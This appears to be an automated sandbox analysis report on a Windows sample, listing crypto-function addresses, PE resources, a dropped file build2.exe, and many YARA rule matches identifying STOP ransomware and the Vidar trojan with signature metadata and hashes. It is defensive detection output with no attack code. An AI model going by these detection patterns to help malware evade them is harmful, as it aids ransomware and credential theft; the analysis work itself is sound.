Source: Process Memory Space: 2OmglUwx83.exe PID: 4444, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2OmglUwx83.exe PID: 4484, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00426050 0_2_00426050
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00418010 0_2_00418010
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00418DF0 0_2_00418DF0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229CA10 0_2_0229CA10
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022A0B00 0_2_022A0B00
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229DBE0 0_2_0229DBE0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229B000 0_2_0229B000
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229B0B0 0_2_0229B0B0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022930EE 0_2_022930EE
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022A00D0 0_2_022A00D0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022B18D0 0_2_022B18D0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022BE9A3 0_2_022BE9A3
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_022BF9B0 0_2_022BF9B0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229E6E0 0_2_0229E6E0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_0229C760 0_2_0229C760
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040D240 1_2_0040D240
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00419F90 1_2_00419F90
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040C070 1_2_0040C070
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042E003 1_2_0042E003
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042F010 1_2_0042F010
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00410160 1_2_00410160
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004021C0 1_2_004021C0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044237E 1_2_0044237E
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_004344FF 1_2_004344FF
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00449506 1_2_00449506
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0043E5A3 1_2_0043E5A3
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044B5B1 1_2_0044B5B1
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040A660 1_2_0040A660
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0041E690 1_2_0041E690
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00402750 1_2_00402750
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040A710 1_2_0040A710
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040F730 1_2_0040F730
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044D7A1 1_2_0044D7A1
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042C804 1_2_0042C804
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044D9DC 1_2_0044D9DC
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00449A71 1_2_00449A71
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00443B40 1_2_00443B40
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00402B80 1_2_00402B80
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0044ACFF 1_2_0044ACFF
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040DD40 1_2_0040DD40
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040BDC0 1_2_0040BDC0
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0042CE51 1_2_0042CE51
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00420F30 1_2_00420F30
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_00449FE3 1_2_00449FE3
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2OmglUwx83.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe 12A51367C5C85FF3C1DC73743CFACE2E01ACCECF2879A36ADBDDF566D52987B3
Uses 32bit PE files
Source: 2OmglUwx83.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 1.0.2OmglUwx83.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.build2.exe.5f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.0.build2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.2OmglUwx83.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.2OmglUwx83.exe.22115a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.2OmglUwx83.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.2OmglUwx83.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.2OmglUwx83.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.2OmglUwx83.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.2OmglUwx83.exe.22915a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.2OmglUwx83.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
